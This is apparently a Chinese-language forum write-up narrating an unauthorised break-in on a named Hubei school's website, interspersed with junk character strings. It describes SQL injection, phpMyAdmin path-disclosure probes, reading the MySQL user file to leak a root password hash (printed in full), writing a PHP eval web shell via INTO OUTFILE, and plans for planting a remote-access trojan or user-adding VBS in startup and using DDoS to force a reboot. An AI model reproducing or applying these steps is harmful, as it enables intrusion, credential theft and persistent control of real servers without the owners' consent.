友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
, @& `8 h" B! w, B% _1 p) Y% c

/ ]# o, U8 A* f# e% V
常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
  R8 o$ z/ ?- p5 j$ d% j
那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
5 J# S2 l7 b) h8 ]5 T0 b+ w2./phpMyAdmin/phpinfo.php  
" C: L7 ~* U3 k* c3./load_file()  
2 `& ]' c( O  N* M: R* m4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
4 m& K3 U/ ~* b  K; ?& _! x- k5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
* G" \, ?3 [3 N" m2 P/ D7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  

均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
- p! R0 F1 i8 h1 J' a5 ]
1 m' {: W) n1 _: F默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

+ U# G. y$ \' s敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
2 a, b/ I5 j$ C* N+ g4 N
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

' h/ S4 W4 i2 b5 l" B4 N2 ohttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：
( I& C9 s; Y% x+ l3 H6 n% P% G
: H4 O1 h% D) U( v+ h# A17---- r(0072)
18---- o(006f)
! V. R' f: M+ u& o% B% c/ }) y19---- o(006f)
; H" l, W3 v3 a# g- h  `20---- t(0074)
! w" D9 Q! b: s4 G. V. I# [21---- *(002a)
& |( a( w% C" V5 p3 O22---- 8(0038)
23---- 2(0032)
24---- E(0045)
25---- 1(0031)
0 Y! x: o0 f3 x2 R1 h& J1 |% V. A26---- C(0043)
2 \- _  t2 @/ {; _3 t27---- 5(0035)
" p3 B/ y$ k) V' L28---- 8(0038)
  x" Q, h3 }1 y- k29---- 2(0032)
30---- 8(0038)
: G; i0 x( Z0 d3 L( j5 L) O. o31---- A(0041)
$ g( o) X" L7 N( |. d, v  s9 h32---- 9(0039)
* j0 A) ?) K: c* Z) d# K33---- B(0042)
34---- 5(0035)
1 W0 y* i- @( M, T35---- 4(0034)
36---- 8(0038)
5 c) L) ]2 N7 n. S& C& I# E: m37---- 6(0036)
38---- 4(0034)
, y3 U8 }: M1 k, r' `39---- 9(0039)
% c3 ^; X$ i( l% q* E( K" ^3 _5 u40---- 1(0031)
1 r. g$ r& z$ d; _  v41---- 1(0031)
3 }' X0 r$ z. f7 F42---- 5(0035)
; x  Q; n  Z& n; C  {43---- 3(0033)
) G# S% d% s0 @; @" ]/ d- R, [44---- 5(0035)
45---- 9(0039)
46---- 8(0038)
3 ]* ~' o; g& k( |( I47---- F(0046)
" R" x& ?+ g: z6 T, h48---- F(0046)
. T  u2 t. l( `9 c8 B0 c6 P# n+ D49---- 4(0034)
5 Z) e2 [; ?2 f" M, J. U50---- F(0046)
51---- 0(0030)
52---- 3(0033)
53---- 2(0032)
7 ?& B7 V1 P7 p54---- A(0041)
: [6 S$ E% m' R$ z$ v' t55---- 4(0034)
56---- A(0041)
57---- B(0042)
7 k/ s. `+ ?+ e8 h3 K5 P58---- *(0044)
59---- *(0035)
# d; S% f. L6 U0 n! N6 a' @60---- *(0041)
! Y; p1 h; u8 g4 q( S% u8 G61---- *0032)

解密后成功登陆phpmyamin
                          

                             
2 s1 ]9 T. v. q' Q! K) k
& H- n2 Q, W) A3 d' Q找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
8 S. f5 h* I# t0 p, r
$ q" E5 v5 a) z2 B/ {- R, t, k7 Y/ ]成功执行，拿下shell，菜刀连接：
) \% z5 B( e) V3 }
服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
! l% x0 z# r( k2 X; U9 T& K! t

服务器上已经有个隐藏帐号了

  \# f0 R: H% M* V

别名     administrators
; G" j0 ]; h( H2 M6 ^" n注释     管理员对计算机/域有不受限制的完全访问权

; O7 V1 h2 P" f! ^: k) U

成员

$ p) o  D  ^( G2 t0 f: ]

-------------------------------------------------------------------------------
& r6 v7 z) ~. e. k) X, D. oadmin
$ U8 ~6 X! u8 b# o* X! K5 iAdministrator
4 S/ L6 @$ f8 D( tslipper$
4 j3 d  K% O. _* ]1 Lsqluser
命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
! J$ L! w: B. U% ~: P9 \! B+ Z
' H& R, x; q: Eddos服务器重启，不然就只能坐等服务器重启了...............................

" R) ^4 R+ g( T- `      

angel